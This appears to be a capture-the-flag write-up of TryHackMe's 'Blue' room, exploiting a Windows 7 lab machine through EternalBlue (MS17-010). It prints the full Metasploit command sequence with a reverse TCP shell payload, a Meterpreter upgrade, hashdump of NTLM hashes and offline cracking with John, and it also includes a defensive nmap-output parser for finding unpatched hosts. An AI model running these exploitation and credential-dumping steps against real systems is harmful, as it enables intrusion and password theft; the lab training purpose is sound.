Blue

Platform: TryHackMe
OS: Windows
Difficulty: Easy
Tags: eternalblue ms17-010 metasploit windows
Date: 2026-05


Summary

Windows 7 machine vulnerable to EternalBlue (MS17-010). This is one of the most famous exploits in history — used by WannaCry ransomware in 2017. Nmap confirms the vulnerability, Metasploit delivers a SYSTEM shell, and Mimikatz recovers crackable password hashes.


Enumeration

Port Scan

nmap -sV -sC -p- --min-rate 5000 <TARGET_IP>
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1
3389/tcp  open  ms-wbt-server Microsoft Terminal Services

SMB on port 445 is the immediate point of interest on a Windows 7 machine.

Vulnerability Check

nmap --script smb-vuln-ms17-010 <TARGET_IP>
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143

Confirmed vulnerable to EternalBlue. This gives us unauthenticated remote code execution as SYSTEM.
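From the defender's side, the same nmap script output is what a vulnerability-management run over a whole subnet produces. As an added example (not part of the original writeup), a small Python parser that splits nmap's normal output into per-host blocks, trusts the State/IDs lines only inside the smb-vuln-ms17-010 section, and returns the hosts that still need the MS17-010 patch or SMBv1 disabled. The two-host scan below is constructed; the "Nmap scan report for" and "|_" line conventions are assumed from nmap's normal output format.

```python
import re
from dataclasses import dataclass, field

# Constructed sample in nmap "normal" output format: one host the script
# flags VULNERABLE, one where smb-vuln-ms17-010 printed nothing at all.
SAMPLE_SCAN = """\
Nmap scan report for 10.10.10.5
445/tcp  open  microsoft-ds Windows 7 Professional 7601 Service Pack 1
| smb-vuln-ms17-010:
|   VULNERABLE:
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|_    Risk factor: HIGH
Nmap scan report for 10.10.10.6
445/tcp  open  microsoft-ds Windows Server 2016 Standard 14393
"""

@dataclass
class HostResult:
    host: str
    smb_banner: str = ""        # version string nmap printed for 445/tcp
    vulnerable: bool = False    # True only if the script said State: VULNERABLE
    cves: list = field(default_factory=list)

HOST_RE = re.compile(r"^Nmap scan report for (\S+)", re.M)
SMB_RE = re.compile(r"^445/tcp\s+open\s+\S+\s+(.+)$", re.M)
# The script's block runs from its header line to the "|_" line that closes it.
SECTION_RE = re.compile(r"^\| smb-vuln-ms17-010:.*?^\|_.*?$", re.M | re.S)
STATE_RE = re.compile(r"^\|\s+State:\s+(\S+)", re.M)
CVE_RE = re.compile(r"CVE:(CVE-\d{4}-\d+)")

def parse_ms17_010_scan(text):
    """Split nmap output into per-host blocks and record each host's MS17-010 state."""
    results, heads = [], list(HOST_RE.finditer(text))
    for i, m in enumerate(heads):
        end = heads[i + 1].start() if i + 1 < len(heads) else len(text)
        block = text[m.start():end]
        r = HostResult(host=m.group(1))
        banner = SMB_RE.search(block)
        r.smb_banner = banner.group(1).strip() if banner else ""
        section = SECTION_RE.search(block)
        if section:  # only trust State/IDs lines inside this script's own block
            state = STATE_RE.search(section.group(0))
            r.vulnerable = bool(state and state.group(1) == "VULNERABLE")
            r.cves = CVE_RE.findall(section.group(0))
        results.append(r)
    return results

def hosts_needing_patch(text):
    return [r.host for r in parse_ms17_010_scan(text) if r.vulnerable]
```

Feed it the saved output of `nmap --script smb-vuln-ms17-010 <SUBNET> -oN scan.txt` and the returned list is the patch-priority queue; a host whose script section is absent is reported as not vulnerable rather than unknown, so treat hosts with no SMB banner at all separately.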


Exploitation

EternalBlue via Metasploit

msfconsole -q
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS <TARGET_IP>
set LHOST <YOUR_IP>
set payload windows/x64/shell/reverse_tcp
run

Got a shell. Confirmed we landed as SYSTEM:

C:\Windows\system32> whoami
nt authority\system

Shell Upgrade to Meterpreter

Backgrounded the shell and upgraded for better post-exploitation features:

background
use post/multi/manage/shell_to_meterpreter
set SESSION 1
run

Post Exploitation

Password Hashes

hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:<HASH>:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:<HASH>:::

Cracked Jon's hash offline with John:

john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
alqfna22        (Jon)

Flags

# Flag 1 — root of C:
C:\flag1.txt

# Flag 2 — where passwords are stored
C:\Windows\System32\config\flag2.txt

# Flag 3 — Jon's documents
C:\Users\Jon\Documents\flag3.txt

Key Lessons

  • Always check SMB on Windows machines — especially older versions (Win 7, Server 2008)
  • MS17-010 is still seen in real engagements on unpatched internal networks
  • shell_to_meterpreter is essential — raw shells are limited for post-exploitation
  • NTLM hashes from hashdump can often be cracked with rockyou.txt
  • EternalBlue delivers SYSTEM directly — no privilege escalation needed
